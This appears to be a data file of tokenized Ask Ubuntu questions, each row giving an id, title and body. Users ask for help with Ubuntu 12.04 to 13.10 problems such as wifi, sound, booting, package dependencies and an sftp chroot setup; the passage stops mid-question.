369648	ubuntu 13.10 does n't shut down	i have upgraded to ubuntu 13.10 from 12.04 , and since i have installed it , ubuntu does n't shut down properly . it logs out , and i see the ubuntu picture with the points . and that 's it , the computer does n't shut down . so if i want to turn the computer off , i have to press the on/off button , so force the system to stop . i do n't think it is good for the linux , so please help me . i 'm new to linux .
369651	13.10 headphones no sound	i 've tried the alsa force-reload , uninstall , re-install with pulseaudio , killall pulseaudio , the sound setting output configuration , alsamixer enable/disable automute , alsamixer output selection . headphones work , computer-side female jack possible hardware issue . sound level registering in sound settings when output set to headphones . internal speakers work fine . what to do ? am i missing drivers on a clean install ? ty
369653	loaded ubuntu on windows7	after loading ubuntu 12.04.3 onto a 8gb memory stick i loaded into my older second pc . i followed the instructions as per site . after around 40 minutes , it seemed to fully load . i choose reboot , which took a while , then on screen showed ubuntu preparing to run ubuntu for the first time . a screen full of computer jargon came on starting with 72 . 771493 ... ck958 [ 0 ] card 67 etc . at this moment in time my pc is black with an occasional dim flicker please advise if possible .
369655	pidgin ignores preferences	i 've tried to get pidgin working the way i wanted , namely to disable all notifications . which means that i do not want the im-window to appear if a new message arrive , and to disable the blue envelope colouring upon receving a new message . i set the settings : interface - show system tray icon - never interface - hide new im conversations - always but they are somehow ignored ... is this a bug ? can i solve it ? preferably remove pidgin from the indicator-message menu at all , without closing it ? btw : i 'm running 13.10 edit : this happens with the skype4py plugin
369658	google play plugin for rhythmbox	hey guys , i 'm a google play music user running rhythmbox 2.99.1 on ubuntu 13.10 . recently , i found a link to a google play music plugin that had instructions on how to install the plugin . after following these instructions , i opened up the rhythmbox plugin window , and checked the google play music box . then a red minus appears to the left of the plugin . after this error appears , no changes are made to the program . how can i get this plugin to work properly on my system ?
369659	no more sound after running ardour	all the sound works perfect with all the applications on my system . but from the moment i launch ardour , no more sound comes out from other application than ardour . the easy way to get it back is to restart the laptop . this is probably related to jack ... but it 's not clear ... does anyone know what 's going on behind the scene ? how to fix it ?
369662	i wish to make a donation and get an invoice	ubuntu is great and deserves some gratitude , but if it can be deducted from my taxes it 's even greater ! how may i get an invoice for the donation i am about to make ? thanks , mikhail
369663	sftp users not able to upload files	i wanted to restrict my sftp users to their home folders only . so , after so many research and attempts , i found this question which successfully allowed me to chroot them in their folders . now , my problem is that the users in my sftp group called ( sftpusers ) can not upload any files inside their /home/public_html directories , only in folders which has the 777 permission . how to solve this issue ? question link to chroot an sftp directory , you must 1 ) create an user and force root to be owner of it cd /home mkdir john useradd -d /home/john -m -n -g users john sudo chown root : root /home/john sudo chmod 755 /home/john 2 ) change the subsystem location on /etc/ssh/sshd_config : subsystem sftp /usr/lib/openssh/sftp-server subsystem sftp internal-sftp and create a user section : match user john chrootdirectory /home/john forcecommand internal-sftp allowtcpforwarding no x11forwarding no
369666	updating from 8.04 to a newer version ?	i have an old system . it does n't have a dvd drive , and i think the cd drive is a bit wonky . the only disk that i have been able to get to install is an old ( official ) 8.04 kubuntu disk . no disk that i 've burned on a few systems works . they check out , but they do n't seem to survive the install ( another issue ) . i thought once i got a version on that i could update over the web , but no luck . it appears eol . no updates seem to be available , or software to install . is there a way ? i 'd like to get it to as new a version as possible . the next step would be to pull the drive and get a new one , but i 'd rather not .
369667	screen brightness is reset to minimum after power source change	on any power source change ( ac > bat or bat > ac ) , the screen brightness goes to minimum . i noticed this problem since upgrade to saucy is there a way to fix it ? or even better , set a screen brightness for each power source ?
369668	batch print , reprint and scan	i am using ubuntu 13.10 with epson wireless scanner/printer/fax wf 2540 ( it has an automatic document feeder- adf ) . what i am trying to achieve is to be able to print with confidence over already populated a4 pages ( hand drawn or otherwise ) . the idea is to get a batch of a4 pages grouped in a particular order and have them batch printed on specific parts of each page , viewed on screen and edit/processed page by page . my idea was to batch scan the documents in order and display each scanned page to use that to judge/fit on-screen the coordinates for the output of each pages image ... the easiest way to explain this is to look at these slide : https : //drive.google.com/file/d/0b0kuhf6ibidtnul3u1ntt0pgbnc/edit ? usp=sharing i would like to have this automated as much as possible using this printer but i am open to other suggestions . are there any other better printers that can automatically scan and print at the document that is being scanned ... with an accurate positioning in relation to elements already printed on the page ? ? are there any other forums i should be asking and looking for answer/suggestions on my case/dilema ? ?
369669	vmware workstation 10 on windows 7 throws `` internal error '' when powering on ubuntu desktop 12.04 64-bit guest vm	running vmware ws 10 on windows 7 . easy-installed ubuntu desktop 12.04 64-bit . windows task manager seems to say vmware is running 32 bit , but i have a freebsd 64-bit guest running , and a windows 8 64-bit guest running as well . any pointers or clues will be most appreciated .
369670	how do i delete an icon from the desktop but keep it on the launcher ?	i installed steam and the program created two icons one in the launcher and one on the desktop . when i try to delete the one on the desktop , the other one is also deleted . i only want to keep the one on the launcher . i 'm a first time user of ubuntu ( 12.04 ) and it seems confusing sometimes . if you can help , thank you in advance .
369671	my side menu icons are greyed	my side menu is greyed , so that only the file cabinet and gimp are showing . the rest of the icons are just greyed . what 's happening to me ?
369672	how do i install ubuntu 12.04 ppc on a powerpc g4 from commands line or fix the graphical mode ?	i recently got a mac as a gift , a powerpc g4 , which has 1gb of ram but came with no optical drive or hard drive . so i put a dvd burner and a hard drive of 40 gb i got . then download an iso of ubuntu 12.04 for powerpc and burned onto a cd . i 'm trying to install from open firmware ( as i have n't a mac keyboard , i use one standard ) . finally , the installation cd boots , but on live mode and after the ubuntu 12.04 screen i get a message that there is a problem with my graphics adapter but i can continue with minimal graphics and give me the command line . my question is that how do i install through a text or if there is any way to fix this problem to run the graphical mode and so can continue the installation of ubuntu , and if once installed ubuntu the problem will be fixed or what ? i would appreciate if you help me , as i mentioned before , there is almost nothing of ubuntu but i think it will be easier than trying to get the mac os x proper . spend good . adding information : there is not a bios screen , i use openfirmware ( alt+windows+f+o ) to give the instruction to boot from the cd , then shows a menu with the options live , nosplash , driverupdates , etc . i just press enter and set as default `` live '' and shows the ubuntu 's loading screen ( the dots changing from white to red and back ) and then shows the messsage that there is a problem with my adapter , display and input device . i click ok and shows a menu with 4 options : run in low-graphical mode , reconfigure graphics , troubleshoot the error or exit to login prompt . i have chossed all this one with the same results : the screen changes to a kind of terminal with ubuntu @ ubuntu~ > _
369674	ca n't install ubuntu on packard bell laptop	i have a packard bell easynote te69kb laptop that came with windows 8 preinstalled , and i ca n't install ubuntu on it . please help . specifications : • processor : amd a-series a4-5000 • ram : 6gb • graphics : amd radeon hd 8330
369676	installation of anything failed	i got an issue concerning chrome . it launches now perfectly - still trying to install something else i see - you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : google-chrome-stable : depends : lib32gcc1 ( > = 1:4.1.1 ) but it is not installable depends : lib32stdc++6 ( > = 4.6 ) but it is not installable depends : libc6-i386 ( > = 2.11 ) but it is not installable e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . i remember i deleted some folder concerning chrome when it was n't launchable - do n't actually remember what directory exactly . now , when i try this - sudo apt-get -f update & & sudo apt-get -f install i come across an error : sh : 0 : getcwd ( ) failed : no such file or directory seems that deletion was fatal . got any ideas ? thanks .
369677	can i dual boot windows 8.1 and ubuntu	can one partition a windows 8.1 hard drive and reserve , say , a 100 gb partition to install ubuntu and successfully dual boot .
369678	xfce4 empty volume control applet	i just wanted to ask , what could i mess up ? my situation is this : in xfce4.10 ( ! ) on the panel0 i put the indicator applet . it always showed me the volume control and network icons . when i updated to 13.10 and after cleaned some stuff , removed some orphaned package , i noticed , the volume control applet is showing mute and if i clicked on it there is an empty drowdown menu like 10x5 px.. now it became completely useless . so my question is what should i reinstall or change to get the control work ? .. : / thanks .
369681	what are the applications software i have downlaod after i downloaded ubuntu 13.04	i am new on ubuntu and want use it . i switched to ubuntu 13.04 from windows 7 . i would like to which application soft- wares do i need in order to have all i had in windows specially adobe flash alternative software
369682	is it ok to have all these window managers ?	hello again , this is not actually one , but several related questions . i have installed xfce , kde , gnome fallback and dwm ( and obviously i have unity ) . how can i change the login screen ? it is currently always kubuntu 's ( also on shutdown ) , though strangely kubuntu-desktop was n't the first nor last to be installed . why ? where is/are the file ( s ) with which window manager to start ? can i start without x and then start it from the tty ? is all this ok ? is it safe ? i hope you can help me with this , since whenever i login to an envirnment other than kde , i have to login again ( except on dwm ) .
369683	13.10 hangs on waking from suspend except when suspended from console	i know waking from suspend is an issue , but this looks like a separate bug . when i suspend 13.10 on hp pavillion dv6 ( amd 6770m/fglrx 13.10.10 ) from x , it suspends normally but freezes when waking . i get a black screen with a frozen cursor . but when i suspend from console with sudo pm-suspend , it wakes normally , and i can then get back my x with ctrl+alt+f7 . if i suspend by closing lid under x , also freezes when waking up . if i suspend by closing lid under console , it wakes up into the x ( ? ) login , then into a clean session . update . i checked my syslog , kern.log and pm-suspend.log , they appear to show a standard suspend procedure which is completed normally , then followed by many blank lines ( 000s ) , then normal start procedure after hard reset . i may be wrong but looks like kernel panic to me . also , if i suspend with dbus ( how can i suspend/hibernate from command line ? ) instead of pm-suspend , outcome is same .
369684	where do i find details of ubuntu firefox `` install '' offers ?	when i visit some sites ( so far tweetdeck , tumblr , launchpad , google docs ) in firefox , i get a `` would you like install { whatever } '' popup from ubuntu . my options are only yes , `` not now '' and `` do n't ask me again . '' i do n't see any way to get more information about these installations . i ca n't quite tell if they 'd be browser plugins or regular applications ( the ubuntu icon suggests the latter ) and i do n't see any indication that i can get more information about one of these applications before i install it . i 'm hesitant to click `` yes '' just to see what happens . what is going on here ?
369686	cdrw wo n't work with asunder or any other ripping software	running 13.04 on acer chromebook . my external dvdrw cdrw will not work with asunder or any other on music cd ripping programs . installed all restricted codecs and microsoft codecs for viewing videos and that works great now . just ca n't rip music from my music cds .
369688	how to reconnect to a rdp session ?	i have a server running xfce ( ubuntu-server with xfce4 desktop installed ) . i am connecting to it through remmina ( rdp ) . now , i have a virtualbox running on the server and i want to connect to it so that i can interact with it . when i connect , i get a fresh session , new desktop . the virtualbox is definitely running , as i get a pid when calling $ pgrep virtualbox . so how do i get this program run by me back to me ? thanks
369689	no network-manager network devices after upgrade to 13.10	i have had a lot of problems after upgrading from 13.04 to 13.10 including sound etc . which i was able to solve but the newest now is that the network-manager does n't see any of my network devices , although wlan0 and eth0 can be queried and their properties can be set using ifconfig . when going to the network settings from the system settings menu i also get the message that the system services are not compatible with this version . i really need help with this though i might simply install an earlier version of ubuntu soon . on a side note i am disappointed to see that ubuntu is getting more and more problematic ever since version 10 . but that is my personal opinion .
369691	debugging php apps with kdevelop	i am using kdevelop 4.5.1 and i would like to debug php apps . i made a search and i found this article : http : //nikosams.blogspot.com.es/2010/02 ... ugger.html which is from 2010 but i do n't know how follow the instructions ( hopefully not really outdated ) , since i ca n't figure out how to install the additional plugins ( executebrowser ) which seem to be required . do i have to place them in a specific folder ? which one ? do i have to do something else ? additionally these plugins seem to be pretty old as well , and i am afraid they may be outdated . is there any other way to do it ? thanks
369693	dpkg unmet dependency linux-image-generic 13.10	i 've upgraded a few of my boxes to 13.10 and have started to see the following error on them when running apt-get update and apt-get upgrade : setting up linux-image-3.11.0-13-generic ( 3.11.0-13.20 ) ... internal error : could not find image ( /boot/vmlinuz-3.11.0-13-generic ) dpkg : error processing linux-image-3.11.0-13-generic ( -- configure ) : subprocess installed post-installation script returned error exit status 2 dpkg : dependency problems prevent configuration of linux-image-extra-3.11.0-13-generic : linux-image-extra-3.11.0-13-generic depends on linux-image-3.11.0-13-generic ; however : package linux-image-3.11.0-13-generic is not configured yet . dpkg : error processing linux-image-extra-3.11.0-13-generic ( -- configure ) : dependency problems - leaving unconfigured from a few other threads on similar errors , it seems it may be an issue with pwd output in pearl from an install script . since it 's happening on all the 13.10 boxes , i 'm assuming this is a larger issue than just for me . output of dpkg -l linux-image : / . /usr /usr/share /usr/share/doc /usr/share/doc/linux-image /usr/share/doc/linux-image/copyright /usr/share/doc/linux-image/changelog.gz
369694	virtual folder goes offline after updates	apologies if this has been asked but i could n't find anything after a search . i am looking to learn why after i install an update for my ubuntu 12.04 in virtualbox i have to re-install guest additions ( ctrl+d ) ? i do have my settings in virtualbox set as auto-mount : yes and access : full but for some reason even after a shutdown i still have to do sudo mount /media/foo for the folder to attach if that helps .
369696	`` property boss '' runs into errors on wine , is there a way to get it to work without errors ?	i have a server running ubuntu 12.04 and i have installed wine to test if i can run a windows program called property boss . property boss does not support any linux system so i 'm on my own . the install went well with no errors popping up , but when i tried to open the gui i received some script errors . any advice would be greatly appreciated !
369698	after 13.10 update bluetooth will not turn on	just as the title states my bluetooth worked fine until the 13.10 update . it will not turn on at all . my bluetooth keyboard with a separate adapter works though . wifi works as well . i do n't really expect a response but since i ca n't seem to get it to send an error report i 'm reporting it like this .
369701	tried loading skype and it says i ca n't	i tried loading skype and i kept i am told it ca n't install 'libasound2 : i386 ' not sure whats going on any suggestions ?
369704	ubuntu 12.04 : can not install apache2-common	i 've just upgraded to 12.04 from 10.04 , and upgraded apache2 . i ran into the following : while trying to install passenger , it complained that apache2-prefork-dev was missing . sudo apt-get install apache2-prefork-dev complains : apache2-prefork-dev : depends : apache2.2-common ( = 2.2.22-1ubuntu1.4 ) but it is not going to be installed sudo apt-get install apache2.2-common complains : apache2.2-common : depends : apache2.2-bin ( = 2.2.22-1ubuntu1.4 ) but it is not going to be installed sudo apt-get install apache2.2-bin installs . sudo apt-get install apache2.2-common still does not find it . i 've uninstalled all of apache several times , purged , etc . any ideas ?
369705	ugly libreoffice font	i have been experiencing this super annoying bug with fonts in libreoffice . please see below screenshot . the spaces between letters are just messed , no matter what font or level of zoom i choose . when i change the zoom level , the spacing is actually changing but still looks very ugly . i have a pretty much default instalation of ubuntu . i installed a couple of fonts ( droid , mscorefonts ) . i did not change any font settings . fonts in other applications looks great . when i open the very same text in google docs or ms web word , it looks perfect . i would appreciate any help concerning this issue . thanks !
369707	how can i make work the wifi of my mac , on linux ?	hello i am new with linux , so i need some help with the wifi connection , being that my computer is n't able to find any networks . these are the characteristics of my mac : network controller : broadcom corporation bcm4322 802.11a/b/g/n wireless lan controller ( rev 01 ) subsystem : apple inc. device 008d flags : bus master , fast devsel , latency 0 , irq 23 memory at d3200000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : kernel driver in use : b43-pci-bridge broadcom corporation bcm4322 802.11a/b/g/n wireless lan controller [ 14e4:432b ] what should i do to make it works ? thanks : )
369708	no tools for kdenlive	hey guys i use kdenlive to edit videos and than upload them to youtube but recently i was exploring kdenlive , than somehow i do n't know what i clicked that caused closing all the tools ( like clip monitor ) . so now i ca n't watch the edited video and now my clip adder is gone . so now i ca n't even add a clip/movie to my project . i ca n't even make a video for youtube please help me ! : ( as you can see there are no tools or anything all .
369709	how do i reset my desktop computer with pre loaded ubuntu 13.1 to first start ?	i am brand new to the ubuntu community and am already in trouble . i recently purchased a new system76 ratel performance desktop with pre-loaded ubuntu 13.10 . upon first start of the system , no video output was displaying . i turned the system off and tried again using a dvi cable and the video output came through perfectly . however , rather than running me through the install menu , i was sent directly to the login screen . i was never asked to create a username or password and can only log in as a guest . how to i go back to the install 'wizard ' and create a main user ? i would greatly appreciate your assistance as i am so stoked to get this thing working and my nerves are being overtaxed trying to figure this problem out . thank you in advance . adam
369714	where or what are the instructions for installing fmod ex for linux to use in g++ ?	i 'm looking for the instructions on how to install fmod . i want to do extra credit for my computer graphics assignment - sound effects . a teammate wants me to go with something simple , and he suggested that i use fmod ex . ( if you guys can think of something better , do suggest it , but so far fmod looks more promising compared to sdl , openal , etc . ) right now i 'm having a really hard time finding the instructions for installing the latest version of fmod ( audio content creation tool ) on linux ubuntu 12.04 lts ( 32-bit ) so that i can use it in g++ with opengl . i checked out this youtube video : http : //www.youtube.com/watch ? v=avgxnkias9g , but it 's for windows . then , there is a ubuntu forums thread which redirected me to this page : https : //wiki.debian.org/fmod , and it has some dated instructions . i 've downloaded fmod ex v. 4.44.24 , which i believe is the latest version . now i 'm looking at eight files : libfmodex.so ; libfmodex64.so ; libfmodex64-4.44.24.so ; libfmodex-4.44.24.so ; libfmodexl.so ; libfmodexl64.so ; libfmodexl64-4.44.24.so ; libfmodexl-4.44.24.so ... not knowing what to do . i 've looked everywhere i could think of : stackoverflow , here , youtube , google , ... and came up with zilch . please help . thanks in advance .
369722	update-manager does not show all updates	ever since i upgraded to 13.10 , the software updater does not show all the available updates . some will appear and can be installed just fine , but once it claims that all software is up to date , using sudo apt-get upgrade shows that there are still more packages waiting to be updated . i can update them via the command line , but that only solves things temporarily . i 'm not sure why some show up and others do n't . how can i make update manager update all packages ? update-manager shows this : but apt-get shows this : thanks !
369723	grub menu not appearing after install	so i finally was able to install ubuntu , but when i went to reboot my computer , it booted straight to windows 7 . i followed some suggestions and went back into ubuntu using my liveusb and installed boot repair . a window popped up that said efi detected . please check the options . i 'm not sure if that has anything to do with this , but i ignored that message and ran the recommended repair . here is my pastebin : http : //paste.ubuntu.com/6344071/ i then rebooted , but it once again booted to windows . how can i fix this ? thank you .
369726	how to revoke gnupg public key without private key ?	long story short i have an key generated with seahorse and mistakenly deleted it from my system . i do remember passphrase but i do n't have this key anywhere on my system . scanned trough ask ubuntu but could n't find any aplicabile solution on similar issue . however public key is still updated on keyring servers and i would like to revoke it . since i have no revocation certificate and i ca n't get hold of private key ( only public key is available from keyservers which i imported to seahorse ) i have no idea how to accomplish it . spent some time searching for solution acros net , various manuals and so on , but so far no luck . gpg -- list-secret-keys - > returns no output at all . gpg -- list-keys - > returns public key info gpg -- gen-revoke *user-id* - > returns - > gpg : secret key *user-id* not found : eof gpg ( gnupg ) version 1.4.11 . anyone able to suggest a solution ?
369727	13.10 not displaying on hdtv from boot	i am running 13.10 on my dell latitude e6410 as a media server with xbmc . every now and then when i power on the laptop it fails to display on my sony bravia hdtv . i 've the laptop connected to the tv via a display port to hdmi adapter . i then restart the machine and on the second attempt the desktop displays without a problem . any ideas how to solve this one ? ?
369728	location of gnome classic ( metacity ) quicklaunch shortcuts ?	what is the directory that .desktop files are copied to when a .desktop file is dragged to the gnome clasic quicklaunch bar ? i would like to be able to modify them
369730	ubuntu touch on ipod touch ( 5th generation ) ?	okay so is there anyway ( so if i wipe the system or just jailbreak or something ) to get ubuntu on the ipod . if nothing is out there what needs to be coded ? i got some free time everyday so i can make a project out of this but just seeing what is if anything is out there ? in all i want ubuntu on my ipod touch .
369734	how can i install the $ 0 applications from the ubuntu software center with apt-get ?	in the ubuntu software center , there are lots of $ 0 apps that i can 'purchase ' : for example : crazytoad pinball-bakno colorsudoku as these applications are free ( as in beer ) , i wonder how i can install them using apt-get .
369735	is it possible to move /boot , /bin , /sbin , etc , ?	my client has me working on a project that i 'm a little lost on in terms of any kind of sure-fire answer . he uses amazon ec2 to host his servers -- namely , he utilizes spot requests . if you 've used ec2 spot requests before , you 're aware that upon termination of an instance , its data is lost . to solve this , he wants to attach and mount an external ebs volume . he provided a list of the directories that he wants to be persistent . he insists that i find a way to do this , but i 'm nearly certain it is impossible . i was able to move a few of the root directories with no ill side effects ( i moved them to the mounted ebs and created symbolic links pointing to the proper locations ) . /home is easy to move , as was /var , /usr , and a couple more . he insists , however , that /bin , /sbin , /lib , /lib64 , and /etc must reside on the ebs volume . it seems obvious to me that this wo n't work , as the ebs volume must be mounted at some point . the earliest point i 'm able to mount it , as far as i know , is via /etc/fstab . if you store /etc on the external drive , then how are you going to mount it ? if you ca n't mount it , how are you going to access /etc/fstab ... . it 's a paradox . so , am i correct in my assumptions ? whether i am or i am not , please help me out by providing enough information to explain the situation to him . my intuition immediately screams `` no '' to this idea , but i honestly do n't have a single , big-picture , solid argument to back myself up . thanks ! additional information : he is saying he would like for me to find a way to keep all core , necessary files on the root drive , whilst simultaneously storing anything else on the ebs volume . please tell me i 'm not crazy and that this is just completely insane .
369736	ubuntu 13.10 sees my network but wo n't connect	i 'm using an edimax ew-7811un adapter for wifi . my network is identified , i go to connect by entering my password and i even checked to make sure the security settings were correct but it just wo n't connect . i 've restarted my router . i 've even removed the security from the router and ubuntu still wo n't connect . any ideas what i might be doing wrong ?
369740	ubuntu 13.10 on asus eee pc - possible issues ?	i 'm looking to play around with ubuntu 13.10 on my asus eee pc 1101 ha with 2 gb ram ( upgraded at purchase ) via a live usb or bootable usb drive and i am wondering if anyone knew of any issues that it might cause with windows xp . i ran the 64-bit version in the same way on a 32-bit machine and then when i booted the pc again normally and windows wanted to run a system restore on the machine . thanks
369743	ca n't connect to or see my wifi ssid	today i installed ubuntu 12.04 on my laptop . i am unable to see my home ssid or even connect to it . i 've tried to connect as a hidden ssid but i always get prompted for authorization although my key is correct . i 'm in in europe but my laptop is from the us . i 'm not sure if that is relevant . i 've read around this site and saw something that has to do with setting the channel above 11 . i 'm not sure i did that correctly i did this : how to use wi-fi channels above 11 ? did n't help . i 'm able to connect with cable but not via wifi either windows or linux . other devices in my home can connect without any issues , even the kindle . here is the screenshot from my router : here is some additional info : lspci | grep -i network : 08:00.0 network controller : qualcomm atheros ar9285 wireless network adapter ( pci-express ) ( rev 01 ) lspci -nnk | grep -a2 0280 : 08:00.0 network controller [ 0280 ] : qualcomm atheros ar9285 wireless network adapter ( pci-express ) [ 168c:002b ] ( rev 01 ) subsystem : hewlett-packard company u98z062.10 802.11bgn wireless half-size mini pcie card [ 103c:303f ] kernel driver in use : ath9k nm-tool : networkmanager tool state : connected ( global ) - device : wlan0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- type : 802.11 wifi driver : ath9k state : disconnected default : no hw address : 90:4c : e5:38:79:0d capabilities : wireless properties wep encryption : yes wpa encryption : yes wpa2 encryption : yes i 'm not sure what to do next . any suggestions ?
369747	is it possible to have the opened application bar on top with the launcher bar ( gnome metacity )	i would like to have the opened windows bar on the top as a second bar fused with the launcher bar in gnome classic without effects ( presumably aka gnome metacity ) . is it possible to configure it like so ? it make no sense to split application manipulation along two completely opposite sides of the screen . windows for example facilitates this by facilitating multiple lines of taskbar , namely one line for quicklaunch and the other for the opened applications which is my objective as specified .
369748	torrent lens not working	i have just installed the torrent lens on ubuntu 12.04 and it returns no matches for any keyword . i may have installed it incorrectly , but how can i check ? i am new to ubuntu and linux , only having installed it a few days ago .
369749	why am i always getting 2 errors after check disk with the installation of 12.04 lts from a usb stick ?	the iso file checks out ok with winmd5sum . i used the universal-usb-installer-1.9.4.4 . i want to be able to dual boot with win 8 . any help is appreciated . tks , joel
369752	installed ubuntu does n't boot	i can boot and install ubuntu 12.04 lts ( 64 ) from a usb , but after installation , trying to boot from the hard drive that just had ubuntu installed does not work . now i think i understand where the problem comes from . when booting from the usb , it also will not boot correctly unless on the first screen , i press f6 ( other options ) and put a checkmark next to `` acpi=off '' or `` nomodeset '' . ( one or both , as long as one is checked , it does n't seem to make a difference ) when trying to boot from my hard drive and holding shift , i have 2 options ( excluding the memtest options ) in which i can choose to boot ubuntu normally or in recovery mode . i did n't find anything in the options of recovery mode i found useful . how can i fix this issue ? ' edit : fixed my own problem . finally found a page with decent advice after i couldnt figure it out myself . https : //help.ubuntu.com/community/boot-repair for anyone who may ever have the same problem .
369753	ubuntu desktop 12.04 network connections	i have two pcs , the host one is connected with the public network , and it has two network cards , and one is connected the public network via the dhcp , and the other pc only has one network card , and it is connected with the host 's second network card via a cable . and the host and the client both are ubuntu desktop 12.04 . now i want to share the host 's public network with the client pc , i set the host 's second network card ip address is 192.168.0.1 and i can not edit the configuration of the client pc 's network , because it 's network connections applet is missing . i opened it in the applications -- > system tools -- > administration -- > network tools , it shows the eth1 , but i can not edit its configuration . could you give me some advice about how to share the host 's public network with the client pc ? thanks .
369754	restarting gdm makes screen glitchy and annoying wifi issue	first issue is when i type `` sudo service gdm restart '' i get a weird glitchy screen , i can see the mouse cursor and the desktop is responsive , but nothing is readable and i ca n't tell where anything is because it looks so glitchy . how can i fix this restart issue . second issue was found out because of this main annoying issue . i 'm not quite sure why it happens , but it appears when my computer goes to sleep and it wakes up on another network it freaks out and wo n't read any networks or turn on correctly . so is there a way to reset the wifi ? i would simply google the problem , but i do n't even know the keywords to search for , same with the first issue stated .
369755	question about partitioning	i am looking to dual boot windows 7 and ubuntu 13.10 . i have been using windows for work and school for over a year , and have about 100 gig of stored files ( backed up of course ) and some paid programs . because of this , i really want my partitioning experience to go well . unfortunately , i am running into a bit of an anomoly when i load gpart , i see that my sda drive is unallocated whereas my sdb appears to contain all of the windows files and partitions , and make up my c : drive is this going to be an issue , as all literature on dual boot installation references sda ? how do i work around it ? system info : lenovo ideapad y570- 750gb hdd with 64gb ssd processor : intel® core™ i7-2670qm cpu @ 2.20ghz × 8
369756	unable to change brightness ubuntu 13.04 toshiba satellite a105	i have a toshiba satellite a105 s4384 running ubuntu 13.04 and for some reason i can not change the brightness . neither the function keys ( fn + f6/fn + f7 ) nor the settings work , and it is really bothersome , as i would like to occasionally decrease the brightness ( long car trips where my battery does n't last , etc . ) does anyone have any idea ? judging by the suggested questions this seems to be a rather prevalent issue , but none seem to have an answer ! i had a similar problem with 12.04 lts before i upgraded .
369758	lost kde effects after 13.10 upgrade	after kubuntu 13.10 upgrade , alt+tab and desktop pager effects do not work anymore . they are enabled in desktop effects . how can i solve this issue ? it seems i have nvidia drivers installed .
369760	what are the differences between sleep , standby , suspend and hibernate in ubuntu ?	i 'm really confused about these keywords used in ubuntu . i 've a little knowledge about suspend and hibernate in ubuntu and how does it work . but i 've no idea about what are the differences between sleep and standby . in result what are the differences between these four often used terms in ubuntu ? i searched in google before asking here but did n't get any answer specific to ubuntu . i 'll be very happy to get a good definition , and appreciate for the time given to answer this question .
369762	how to port ubuntu touch application to android ?	i 'm a newbie developer and i 've developed some application in ubuntu sdk so that i can use in my ubuntu phone or desktop . but is there any way that i can port my ubuntu touch application to android so that i can also use in my android smartphone ? i 've tried necessitas 1.3 but it comes with default qt 4.8 , and also i can not use ubuntu components . ( i could use default qt , but ubuntu components is not available ) so , my question is again , is there any way to port my ubuntu touch application to android ? thank you very much !
369768	ubuntu 13.04 wont boot to windows dvd	i have ubuntu 13.04 installed on hp pavilion sleekbook 14 . i have a usb cd/dvd rom plugged in and bios set to boot to it first . when i turn on my computer i hear the dvd spinning and the light blinking but i do n't get an option on the screen to boot to it . i want to install windows 8 on this laptop because well my niece does n't like ubuntu . thanks for your help !
369770	how to prevent grub from appearing after selecting ubuntu from windows ' dual boot menu ?	i have windows 7 and ubuntu 13.10 dual-boot . i have been trying to figure out a way to make windows boot menu the only boot menu that comes up . i used easybcd to add an option to boot into ubuntu from the windows boot menu , but i would like to make it so that the grub screen does n't show up when i select the ubuntu option . i could n't get it to work using grub customizer . anything i can try using those two programs or anything else ?
369771	ubuntu 12.04 , lenovo 12.04 , brcm 4313 wifi : after update wifi not getting connected	this question has been asked many times and answered . but that 's what is creating more confusion to me as there is no single definitive step by step guide to solve this problem . just to repeat : 1 . after update , wifi ap does not get connected . laptop keeps on flashing message to enter password . can anyone help ? ( will moving 13.10 solve this problem ? ) regards , jagmohan
369772	interface is not supporting in vmware workstation for ubuntu 12.04 as well as in 13.04 before version are working perfectly what is the problem	i am using the laptop of compaq 610 on it i use vmware workstation where i install another version of ubuntu when i installed the latest versions of ubuntu from 12.04 the interface is not appearing i restarted and rebooted several times and the same problem faced by me when i installed 13.04 what is the problem please answer me if you any answer .
369773	ca n't install php5-msql	hello friends i 'm finishing the process of installing apache/php/mysql installations but this shows up : # sudo apt-get install mysql-server php5-msql reading package lists ... done building dependency tree reading state information ... done e : unable to locate package php5-msql after some adjustments this happened : angel @ voix : ~ $ sudo apt-get install mysql-server php5-mysql reading package lists ... done building dependency tree reading state information ... done mysql-server is already the newest version . php5-mysql is already the newest version . the following packages were automatically installed and are no longer required : gir1.2-ubuntuoneui-3.0 libubuntuoneui-3.0-1 thunderbird-globalmenu use 'apt-get autoremove ' to remove them . the following extra packages will be installed : mysql-server-5.5 suggested packages : tinyca mailx the following packages will be upgraded : mysql-server-5.5 1 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . 4 not fully installed or removed . need to get 0 b/8,827 kb of archives . after this operation , 32.7 mb of additional disk space will be used . do you want to continue [ y/n ] ? debconf : dbdriver `` config '' : /var/cache/debconf/config.dat is locked by another process : resource temporarily unavailable ( reading database ... dpkg : warning : files list file for package `mysql-server-5.5 ' missing , assuming package has no files currently installed . ( reading database ... 172971 files and directories currently installed . ) preparing to replace mysql-server-5.5 5.5.34-0ubuntu0.12.04.1 ( using ... /mysql-server-5.5_5.5.34-0ubuntu0.12.04.1_amd64.deb ) ... debconf : dbdriver `` config '' : /var/cache/debconf/config.dat is locked by another process : resource temporarily unavailable dpkg : error processing /var/cache/apt/archives/mysql-server-5.5_5.5.34-0ubuntu0.12.04.1_amd64.deb ( -- unpack ) : subprocess new pre-installation script returned error exit status 1 debconf : dbdriver `` config '' : /var/cache/debconf/config.dat is locked by another process : resource temporarily unavailable dpkg : error while cleaning up : subprocess new post-removal script returned error exit status 1 errors were encountered while processing : /var/cache/apt/archives/mysql-server-5.5_5.5.34-0ubuntu0.12.04.1_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) angel @ voix : ~ $ sudo apt-get install mysql-server-5.5 reading package lists ... done building dependency tree reading state information ... done the following packages were automatically installed and are no longer required : gir1.2-ubuntuoneui-3.0 libubuntuoneui-3.0-1 thunderbird-globalmenu use 'apt-get autoremove ' to remove them . suggested packages : tinyca mailx the following packages will be upgraded : mysql-server-5.5 1 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . 4 not fully installed or removed . need to get 0 b/8,827 kb of archives . after this operation , 32.7 mb of additional disk space will be used . debconf : dbdriver `` config '' : /var/cache/debconf/config.dat is locked by another process : resource temporarily unavailable ( reading database ... dpkg : warning : files list file for package `mysql-server-5.5 ' missing , assuming package has no files currently installed . ( reading database ... 172971 files and directories currently installed . ) preparing to replace mysql-server-5.5 